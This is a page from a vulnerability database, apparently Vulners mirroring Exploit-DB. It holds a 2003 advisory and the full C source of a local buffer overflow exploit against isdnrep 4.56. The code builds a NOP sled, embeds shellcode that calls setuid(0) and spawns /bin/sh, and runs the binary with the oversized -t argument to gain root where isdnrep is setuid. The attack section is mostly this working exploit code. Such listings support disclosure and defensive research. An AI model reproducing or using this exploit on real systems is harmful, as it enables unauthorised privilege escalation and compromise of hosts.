Lucene search
K

ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)

🗓️ 03 Jul 2003 00:00:00Reported by aceType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

isdnrep 4.56 has a local buffer overflow vulnerability allowing privilege escalation.

Code
// source: https://www.securityfocus.com/bid/8100/info

isdnrep has been reported prone to a local command line argument buffer overflow vulnerability.

The issue presents itself due do a lack of sufficient bounds checking performed on user-supplied data that is copied from the command line into a reserved internal memory buffer. It is possible for a local attacker to influence the execution flow of isdnrep and have arbitrary operation codes executed in the context of the vulnerable application. Exploitation could permit privilege escalation on systems where the application is installed setuid/setgid.

It should be noted that although isdnrep version 4.56 has been reported vulnerable, other versions might also be vulnerable.

/*

  STX SECURITY LABS:
 
  5358isdnrape.c - x86 local buffer overflow exploit
  proof of concept code by: ace [ [email protected] ]
  vulnerability discovered by: t0asty [ [email protected] ]
 
  Description:
 
  isdnrep  reads  the  isdnlog log files, generates reports,
  does statistics, and other things. It  can  also  generate
  HTML output for use with a web server.

  Vulnerability:

  A buffer overflow vulnerability resides in isdnrep.
  A segmentation fault occurs when 2152 bytes of data are sent to
  the binary using the -t switch. The data overwrites the EIP therefore
  it allows us to control the pointer, allowing us to execute code.
  
  Versions vulnerable:

  [-] All versions are believed to be vulnerable.
      Tested on: isdnrep Version 4.56

  *************************************************
  * Note: isdnrep may not be suid on all systems. *
  *************************************************

  StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
  X                                        X
  X STX ONLINE [ www.static-x.org ]        X
  X                                        X
  StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
 
  *************************************************
  * Note: our pen0rs are 50 x larger than yours.  *
  *************************************************
 
*/

#include <stdio.h>

char stxcode[] =

     /* ace's shellcode [ [email protected] ] (setuid=0,/bin/sh) */
     "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x03\x5e\xeb\x05\xe8\xf8\xff"
     "\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x50\x80\x36\x01\x46\xe2\xfa\xea"
     "\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01\x54"
     "\x88\xe4\x82\xed\x11\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xb6"
     "\x11\x01\x01\x8c\xb2\x2f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01"
     "\x88\x74\xf9\x8c\x4c\xf9\x30\xd3\xb9\x0a\x01\x01\x01\x52\x88\xf2"
     "\xcc\x81\x5a\x5f\xc8\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91";


unsigned long pen0r(void) 

{
 __asm__("movl %esp, %eax");
}

int main(int argc, char **argv) {
 
 int pos; int ace = pen0r(); int stxnop = 0x90;
 int stxbytes = 2148; int stxtotal = stxbytes + 4;
 char *stxbof;
 stxbof = (char *)malloc(stxbytes); 

 for(pos = 0; pos < stxbytes; pos++) {*(long *)&stxbof[pos] = stxnop;}
 *(long *)&stxbof[stxbytes] = pen0r();
 memcpy(stxbof + stxbytes - strlen(stxcode), stxcode, strlen(stxcode));

 system("clear");
 printf("#######################################\n");
 printf("#        [ STX SECURITY LABS ]        #\n");
 printf("#  isdnrep local poc exploit by: ace  #\n");
 printf("#######################################\n\n");
 printf("[+] Return Address: 0x%x\n", ace);
 printf("[+] Buffer Size: %d\n", stxtotal);
 printf("[-] /usr/bin/isdnrep -t pwned!\n\n");

 execl("/usr/bin/isdnrep", "isdnrep", "-t", stxbof, NULL);

return 0;

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation